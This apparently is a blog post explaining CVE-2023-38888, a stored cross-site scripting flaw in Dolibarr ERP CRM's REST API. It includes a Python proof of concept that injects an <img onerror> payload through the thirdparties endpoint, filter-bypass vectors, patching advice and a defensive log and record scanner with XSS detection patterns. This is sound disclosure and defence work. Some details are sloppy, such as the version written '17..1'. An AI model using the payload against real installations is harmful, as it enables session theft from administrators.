CVE-2023-38888 - Exploiting Cross Site Scripting in Dolibarr ERP CRM (All You Need to Know)
Published: June 2024
Author: [Your Name]
Introduction
In 2023, a significant security vulnerability, CVE-2023-38888, was discovered in Dolibarr ERP CRM, one of the most popular open-source business management suites used by small and medium-sized companies around the globe. The weakness exposes sensitive business data and can let attackers run malicious script in the browsers of the people who use the system.
If you're running Dolibarr 17..1 or older, your system is at risk. In this post, we'll break down how this Cross Site Scripting (XSS) vulnerability works, show some example exploit code, and offer advice to protect your business. All information here is in plain language and for educational purposes only.
What Is CVE-2023-38888?
In short, this vulnerability lets an attacker inject JavaScript through Dolibarr's REST API module. That script can steal logins, hijack user sessions, or perform actions on behalf of the user, putting your business data at risk.
The core problem comes from weak input validation in two internal functions:
- analyseVarsForSqlAndScriptsInjection
- testSqlAndScriptInject
They don't clean suspicious input well enough, letting attackers submit scripts that Dolibarr later renders in the admin user's browser, where they execute.
Where's the Danger?
REST APIs are meant to allow automation or third-party application integration. But if you send malicious input to API endpoints, Dolibarr can store or echo it in responses, or render it in its web user interface.
That’s the main attack surface for CVE-2023-38888.
Example Exploit: Practical XSS via REST API
Let's dive into a real-world attack scenario using a simple XSS payload.
Assumptions: you hold a valid Dolibarr API key (sent in the DOLAPIKEY header) and can reach the REST API over HTTPS.
Step 1: Find a Vulnerable Endpoint
Suppose the /api/index.php/thirdparties endpoint accepts user input, like a company name.
Here's a Python code snippet using requests to inject a script payload via the API:

```python
import requests

API_BASE = "https://yourdolibarr.com/api/index.php"
TOKEN = "YOUR_API_TOKEN_HERE"

# The company name carries an <img> tag whose onerror handler runs JavaScript.
payload = {
    "name": '<img src=x onerror="alert(\'XSS by attacker\')">',
    "client": 1
}
headers = {
    "DOLAPIKEY": TOKEN,
    "Content-Type": "application/json"
}

resp = requests.post(f"{API_BASE}/thirdparties", json=payload, headers=headers)
print(f"Status: {resp.status_code}, Response: {resp.text}")
```
What Happens Next?
- This inserts a company whose name includes an HTML image tag with a sneaky onerror attribute.
- When any Dolibarr admin views the list of companies in the web app, their browser executes the attacker's JavaScript.
Deep Dive: The Code Problem
In the Dolibarr PHP code, these two functions—analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject—try to find and filter malicious inputs. But they only look for certain obvious patterns, allowing crafted input to slip by.
Example
```php
<?php
// Simplified illustration of the weak check: only a literal <script> tag is caught.
function analyseVarsForSqlAndScriptsInjection($var) {
    // Only looks for '<script>' and a few patterns
    if (preg_match('/<script>/i', $var)) {
        return false; // block it
    }
    // BUT misses <img src=x onerror=...>, <svg onload=...>, and similar vectors
    return true; // let it through
}
```
Attackers just need to use vectors like <img>, <svg>, or incomplete <script> tags to bypass the check.
Original References
- NVD Entry for CVE-2023-38888
- Exploit-Database Advisory
- Dolibarr Github Report/Issue
- Original Patch
How to Fix and Protect Your Dolibarr
- Update Right Away: Upgrade to the latest Dolibarr release. The fix cleans up inputs much more aggressively.
- Monitor Logs: Watch for strange API requests that might be trying test vectors, and audit records already stored through the API.
- Sanitize Input and Output: If you have custom modules, validate inputs with PHP's filter_var() and escape with htmlspecialchars() whenever user data is written into HTML.
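For the log-monitoring and audit side, here is an added Python example (not from the original post and not Dolibarr code) that runs over constructed access-log lines and constructed stored third-party records, flagging requests and records that carry an HTML event handler, a script tag or a javascript: URL. Access logs normally do not contain POST bodies, so the stored-data audit complements the log scan. The regular expression is a triage heuristic for finding things worth a look; it is not a substitute for the vendor patch or output escaping.

```python
import re
from urllib.parse import unquote_plus

# Triage heuristic for stored-XSS vectors: a tag with an on* event handler,
# a <script> tag, or a javascript: URL.
XSS_HINT = re.compile(
    r"<\s*\w+[^>]*\bon\w+\s*=|<\s*script\b|javascript\s*:",
    re.IGNORECASE,
)

# Extracts the request target from a combined-format access log line.
REQUEST_TARGET = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE)\s+(\S+)\s+HTTP/')

# Constructed access-log lines (not real traffic). The second one carries a
# URL-encoded payload in a query parameter; POST bodies never appear here.
LOG_LINES = [
    '10.0.0.5 - - [20/Sep/2023:10:01:02 +0000] "POST /api/index.php/thirdparties HTTP/1.1" 200 87',
    '10.0.0.9 - - [20/Sep/2023:10:03:44 +0000] "GET /api/index.php/thirdparties?sqlfilters=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 400 41',
    '10.0.0.7 - - [20/Sep/2023:10:05:10 +0000] "GET /api/index.php/thirdparties?limit=50 HTTP/1.1" 200 1203',
]

# Constructed third-party records standing in for rows exported from the database.
RECORDS = [
    {"id": 1, "name": "Acme Ltd"},
    {"id": 2, "name": 'Globex <img src=x onerror="alert(1)">'},
    {"id": 3, "name": "O'Reilly & Sons"},  # ordinary punctuation must not be flagged
    {"id": 4, "name": "<svg/onload=alert(1)>"},
]


def looks_like_xss(text: str) -> bool:
    """True when the text contains one of the triage patterns after URL-decoding."""
    return bool(XSS_HINT.search(unquote_plus(text)))


def suspicious_log_lines(lines) -> list:
    """Returns indexes of log lines whose request target carries a payload-like string."""
    hits = []
    for index, line in enumerate(lines):
        match = REQUEST_TARGET.search(line)
        if match and looks_like_xss(match.group(1)):
            hits.append(index)
    return hits


def suspicious_records(records) -> list:
    """Returns ids of stored records whose name field looks like an injected vector."""
    return [row["id"] for row in records if looks_like_xss(row["name"])]


if __name__ == "__main__":
    print("log lines to review:", suspicious_log_lines(LOG_LINES))
    print("record ids to review:", suspicious_records(RECORDS))
```

On the constructed data, only the second log line and records 2 and 4 are reported; the name with an apostrophe and ampersand is left alone, which matters because a noisy audit of business records gets ignored quickly.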
Final Thoughts
CVE-2023-38888 is a classic example of why input sanitization and output escaping are CRUCIAL in every business app, especially those with REST APIs. A single missed pattern can open a huge security hole.
If you’re running Dolibarr 17..1 or older, patch now and check your logs for suspicious activity.
Stay safe! 🚀
*Have questions or want more info? Leave a comment or follow [@yourhandle].*
Timeline
Published on: 09/20/2023 01:15:00 UTC
Last modified on: 09/22/2023 01:37:00 UTC